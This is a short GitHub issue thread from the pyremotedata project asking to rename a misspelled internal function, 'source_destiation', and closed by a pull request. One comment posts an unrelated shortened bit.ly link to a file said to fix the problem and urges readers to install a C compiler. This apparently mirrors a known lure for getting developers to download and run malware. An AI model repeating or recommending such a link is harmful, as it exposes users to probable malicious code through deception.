### ISSUE TITLE
Fix typo in ImplicitMount.put

### ISSUE THREAD

**Issue by asgersvenning** [asgersvenning/pyremotedata#9]
The internal function [`source_destiation`](https://github.com/asgersvenning/pyremotedata/blob/e93660b1efb365fe62b6ed8a67717502638522c8/src/pyremotedata/implicit_mount.py#L395C13-L395C30), and all uses of it, should be renamed to `source_destination`.

**Comment by AhmadMahmoodRana** [comment]
This might help:This file might fix it
https://bit.ly/4gwC82r
If you don't have the c compliator, install it.(gcc or clang)

**Comment by asgersvenning** [comment]
Closed via pull request #10
